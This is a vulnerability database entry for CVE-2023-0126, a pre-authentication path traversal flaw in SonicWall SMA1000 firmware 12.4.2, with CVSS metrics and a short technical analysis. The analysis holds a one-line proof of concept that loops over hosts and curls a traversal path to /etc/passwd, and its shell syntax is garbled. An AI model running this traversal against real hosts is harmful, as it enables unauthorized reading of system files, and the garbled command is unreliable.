Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
2

CVE-2023-0126

Disclosure Date: January 19, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.

Add Assessment

1
Ratings
Technical Analysis

SonicWall Secure Mobile Access (SMA) 1000 series contains a pre-authentication path traversal vulnerability. This flaw could potentially allow an unauthenticated attacker to access files and directories stored outside the web root directory.

This vulnerability could enable an attacker to traverse the file system and gain unauthorized access to sensitive files and directories. Note: this vulnerability solely affects SMA 1000 firmware version 12.4.2.

PoC: cat file.txt| while read host do;do curl -sk “http://\(host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo \)host “Vulnerable”;done

CVSS V3 Severity and Metrics
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • sonicwall

Products

  • sma1000 firmware 12.4.2

Additional Info

Technical Analysis